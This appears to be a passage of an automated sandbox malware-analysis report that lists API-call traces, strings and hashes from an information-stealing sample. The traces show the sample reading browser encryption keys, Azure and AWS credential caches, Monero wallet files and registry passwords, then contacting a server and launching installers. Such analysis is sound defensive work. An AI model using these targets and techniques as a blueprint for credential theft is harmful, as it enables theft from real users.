                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00A7CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A7CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A7CAD9
                                  • StrStrA.SHLWAPI(?,0068D200,00A90B52), ref: 00A7CAF7
                                  • StrStrA.SHLWAPI(00000000,0068D320), ref: 00A7CB1E
                                  • StrStrA.SHLWAPI(?,0068DA20,00000000,?,00A91458,00000000,?,00000000,00000000,?,00688AB8,00000000,?,00A91454,00000000,?), ref: 00A7CCA2
                                  • StrStrA.SHLWAPI(00000000,0068DB40), ref: 00A7CCB9
                                    • Part of subcall function 00A7C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A7C871
                                    • Part of subcall function 00A7C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A7C87C
                                  • StrStrA.SHLWAPI(?,0068DB40,00000000,?,00A9145C,00000000,?,00000000,00688BA8), ref: 00A7CD5A
                                  • StrStrA.SHLWAPI(00000000,00688A68), ref: 00A7CD71
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B46), ref: 00A7C943
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B47), ref: 00A7C957
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B4E), ref: 00A7C978
                                  • lstrlen.KERNEL32(00000000), ref: 00A7CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00A7CE9C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A842EC
                                  • lstrcat.KERNEL32(?,0068EA78), ref: 00A8430B
                                  • lstrcat.KERNEL32(?,?), ref: 00A8431F
                                  • lstrcat.KERNEL32(?,0068D038), ref: 00A84333
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88D90: GetFileAttributesA.KERNEL32(00000000,?,00A71B54,?,?,00A9564C,?,?,00A90E1F), ref: 00A88D9F
                                    • Part of subcall function 00A79CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A79D39
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A893C0: GlobalAlloc.KERNEL32(00000000,00A843DD,00A843DD), ref: 00A893D3
                                  • StrStrA.SHLWAPI(?,0068E970), ref: 00A843F3
                                  • GlobalFree.KERNEL32(?), ref: 00A84512
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                    • Part of subcall function 00A79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
                                    • Part of subcall function 00A79AC0: LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A844A3
                                  • StrCmpCA.SHLWAPI(?,00A908D1), ref: 00A844C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A844D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00A844E5
                                  • lstrcat.KERNEL32(00000000,00A90FB8), ref: 00A844F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID: ph$xh
                                  • API String ID: 3541710228-918046377
                                  • Opcode ID: 1a3b57d83836e04a48346f522a7f8a92fe57152ce59651629eb55bcd261f6e32
                                  • Instruction ID: 8cc0ae53aff5f96a35cc57466ed93f9d46d50ffad73d6015434057934997fca0
                                  • Opcode Fuzzy Hash: 1a3b57d83836e04a48346f522a7f8a92fe57152ce59651629eb55bcd261f6e32
                                  • Instruction Fuzzy Hash: BD7156B6900208BBDB14FBA4DD85FEE73B9BB98300F048599F60997181EA35DB45CF91
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A8906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg$ph
                                  • API String ID: 2244384528-2801389656
                                  • Opcode ID: d63b3cb6db139a1069f9802a0df5986cbcf877eace2f54afcea0625c3886978a
                                  • Instruction ID: 8469e79d3119dda7e86d065fe105b126b71bedf0edf3c61b4e30893c8c99051e
                                  • Opcode Fuzzy Hash: d63b3cb6db139a1069f9802a0df5986cbcf877eace2f54afcea0625c3886978a
                                  • Instruction Fuzzy Hash: EB71F1B1910208AFDB04EFE4DD89FEEB7B9BF48700F148618F555A7290EB35A905CB61
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00A84DCD
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00A84E59
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                    • Part of subcall function 00A84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                    • Part of subcall function 00A84910: FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A84EE5
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A849B0
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A908D2), ref: 00A849C5
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A849E2
                                    • Part of subcall function 00A84910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A84A1E
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,0068F500), ref: 00A84A4A
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,00A90FF8), ref: 00A84A5C
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,?), ref: 00A84A70
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,00A90FFC), ref: 00A84A82
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,?), ref: 00A84A96
                                    • Part of subcall function 00A84910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A84AAC
                                    • Part of subcall function 00A84910: DeleteFileA.KERNEL32(?), ref: 00A84B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 49ef2594cc85786d6be43b8d596cd6772f4ae68899c3a0157fd69125efecefa8
                                  • Instruction ID: 770f8f48ea61b401d6599a3d67d0c6c451e4e49983e0cf5bd66bcf3524701fe8
                                  • Opcode Fuzzy Hash: 49ef2594cc85786d6be43b8d596cd6772f4ae68899c3a0157fd69125efecefa8
                                  • Instruction Fuzzy Hash: CB41D37AA4020476DB14F770DD47FED3278AB64740F004894B28A620C1FEB55BC88B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID: h
                                  • API String ID: 2001356338-961787225
                                  • Opcode ID: 22b8648300fefdf4db1788d8c71dec280e613c111caca4d0a63cab6cf1d3b15f
                                  • Instruction ID: fee26e23cf4c2acf8b83b27b6b981a9f97fe1aa9b381df4837cde69cbe7e9a12
                                  • Opcode Fuzzy Hash: 22b8648300fefdf4db1788d8c71dec280e613c111caca4d0a63cab6cf1d3b15f
                                  • Instruction Fuzzy Hash: D6C173B5E002199BCB14FF60DD89FEE7778BB64304F004599F50AA7241EE74AA85CFA1
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A831C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A8335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A834EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 1c3e3eb3c446d65fcfd4a14eed5f09678b7fd5785b967d9b668faa7cda3fd824
                                  • Instruction ID: 94ae89612e48441531a644a6383e134835388ac2cca98824df2ba37db5312736
                                  • Opcode Fuzzy Hash: 1c3e3eb3c446d65fcfd4a14eed5f09678b7fd5785b967d9b668faa7cda3fd824
                                  • Instruction Fuzzy Hash: 15120271D101189AEB19FBA0DE92FEDB778AF24300F50455AF50676191EF382B4ACF62
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A76280: InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                    • Part of subcall function 00A76280: StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                    • Part of subcall function 00A76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                    • Part of subcall function 00A76280: HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                    • Part of subcall function 00A76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                    • Part of subcall function 00A76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85318
                                  • lstrlen.KERNEL32(00000000), ref: 00A8532F
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00A85364
                                  • lstrlen.KERNEL32(00000000), ref: 00A85383
                                  • lstrlen.KERNEL32(00000000), ref: 00A853AE
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: e3f72cf8bf65cce959a52b7742ceafe76b9a8262c9841d1e56db0de8468b5d39
                                  • Instruction ID: 00b3e6af73f1abfd16068dab9eaab10b47618a00784b8c7819253307c393ba98
                                  • Opcode Fuzzy Hash: e3f72cf8bf65cce959a52b7742ceafe76b9a8262c9841d1e56db0de8468b5d39
                                  • Instruction Fuzzy Hash: 34511230E101489BEB18FF64CE96AED7779AF20300F504019F80A9B591EF386B45CB62
                                  APIs
                                    • Part of subcall function 00A712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A712B4
                                    • Part of subcall function 00A712A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A712BB
                                    • Part of subcall function 00A712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A712D7
                                    • Part of subcall function 00A712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A712F5
                                    • Part of subcall function 00A712A0: RegCloseKey.ADVAPI32(?), ref: 00A712FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7134F
                                  • lstrlen.KERNEL32(?), ref: 00A7135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00A71377
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A71465
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A714EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: bcb5b7bc98dc0b143de1b74705ffa13b95a0b3e387840cfc75dd6583eedf99d9
                                  • Instruction ID: 9fb6578f7e29029c6f0e41b09dd907760638f138e22ff06be7aeb79a090c0aa8
                                  • Opcode Fuzzy Hash: bcb5b7bc98dc0b143de1b74705ffa13b95a0b3e387840cfc75dd6583eedf99d9
                                  • Instruction Fuzzy Hash: 755197B1D1011857DB15FB60DE96FED737CAF64300F4045D9B60AA2082EE346B8ACFA6
                                  APIs
                                    • Part of subcall function 00A772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A7733A
                                    • Part of subcall function 00A772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A773B1
                                    • Part of subcall function 00A772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A7740D
                                    • Part of subcall function 00A772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A77452
                                    • Part of subcall function 00A772D0: HeapFree.KERNEL32(00000000), ref: 00A77459
                                  • lstrcat.KERNEL32(00000000,00A917FC), ref: 00A77606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A77648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00A7765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A7768F
                                  • lstrcat.KERNEL32(00000000,00A91804), ref: 00A776A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A776D3
                                  • lstrcat.KERNEL32(00000000,00A91808), ref: 00A776ED
                                  • task.LIBCPMTD ref: 00A776FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 9e7ebc3eef4d027ed61eaf3a271a63c00a656ce3ecd84281288123abef29ec38
                                  • Instruction ID: c3532739cc936c3fb355d0c09e27faaf23c3fddf0587cd4d3538cdb1ce26d44a
                                  • Opcode Fuzzy Hash: 9e7ebc3eef4d027ed61eaf3a271a63c00a656ce3ecd84281288123abef29ec38
